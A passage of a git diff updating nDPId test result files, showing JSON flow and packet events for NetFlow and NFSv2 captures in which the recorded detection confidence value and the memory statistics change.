AAAAAAAAAAAAAAAAAAAAoEJE1t3iRNbd4AAAAAAAAAKAAAAAAAAAABBoOfiSJcdiVKtb1noAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNg0AkTYNAAAAAAAAAApoAAAAAAAAAARGDn7MEo6zlqFf+E8QAkwAAMkwAAzG32GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAQcA1AAKBiRNI9AkTYY5AAAAAAAAALUAAAAAAAAAAwYgAUygIAMBAAAAAAAAAAEzKgX1AAAQAQEAAAAAuT+RAcrSAbsRAGwAADIQAAA4TYR4rBWdQthn2RiP2gAAAAAAAAAAAAAAAAAAAAAAAAoGJE0j2SRNhkIAAAAAAAABGwAAAAAAAAAEBioF9QAAEAEBAAAAALk\/kQEgAUygIAMBAAAAAAAAAAEzAbvK0hkAbAAAOE0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAA="} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":200000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"thread_ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":200000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"thread_ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":13468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1568213026962} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2303 chars diff --git a/test/results/nfsv2.pcap.out b/test/results/nfsv2.pcap.out index d3ba753db..ba2fd42c5 100644 --- a/test/results/nfsv2.pcap.out +++ b/test/results/nfsv2.pcap.out 
@@ -2,40 +2,40 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":944207338400} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":944207338400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338400,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZMIAAEAR0zSLGRYCixkWZgzZAG8ASG3iOEEWnwAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":944207338410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338410,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMjjQAAEARqdKLGRZmixkWAgBvDNkAOJnwOEEWnwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":944207338410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207338410,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZMMAAEAR0v+LGRYCixkWZgKfBBgAfBoVOEEWnwAAAAAAAAACAAGGpQAAAAEAAAABAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":944207338430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":944207338430,"pkt":"AMCV4Bm+AMCV+E3TCABFAABYjkAAAEARqbqLGRZmixkWAgQYAp8ARO2bOEEWnwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEIUAAAPnAAoAAAAAsloAAAApAAoAAAAAsloAAAAp"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":944207338440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338440,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZMQAAEAR0zKLGRYCixkWZgzbAG8ASNmgOEGq3wAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqMAAAACAAAAA3VkcAAAAAAAAAAAAA=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338450,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMjkcAAEARqb+LGRZmixkWAgBvDNsAOALjOEGq3wAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAETEzOS4yNS4yMi4xMDIuOC4xAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207338450,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZMUAAEAR00mLGRYCixkWZgzcCAEAMD5NOEGq3wAAAAAAAAACAAGGowAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207338450,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA0jkkAAP8R6tSLGRZmixkWAggBDNwAIMUUOEGq3wAAAAEAAAAAAAAAAAAAAAAAAAAA"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":944207338490,"pkt":"AMCV+E3TAMCV4Bm+CABFAACYZMYAAP8RE\/SLGRYCixkWZgP\/CAEAhHgyXh0LlAAAAAAAAAACAAGGowAAAAIAAAABAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":944207338490,"pkt":"AMCV4Bm+AMCV+E3TCABFAAB8jl8AAP8R6naLGRZmixkWAggBA\/8AaNSdXh0LlAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAEHtAAAAAgAAAAAAAAABAAAAYAAAQAAAAAAAAAAAAAAQEIUAALJaOEd1QgAFMCA4R3VCAAd6EDhHdUIAB3oQ"} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":944207338490,"pkt":"AMCV+E3TAMCV4Bm+CABFAACYZMcAAP8RE\/OLGRYCixkWZgP\/CAEAhHghXh0LlQAAAAAAAAACAAGGowAAAAIAAAARAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQ=="} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":944207338880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338880,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZRAAAEAR0uaLGRYCixkWZgzdAG8ASKDlOErjjgAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338890,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMj1sAAEARqKuLGRZmixkWAgBvDN0AOMzzOErjjgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207338890,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZRIAAEAR0rCLGRYCixkWZgKuBBgAfE0LOErjjgAAAAAAAAACAAGGpQAAAAEAAAADAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
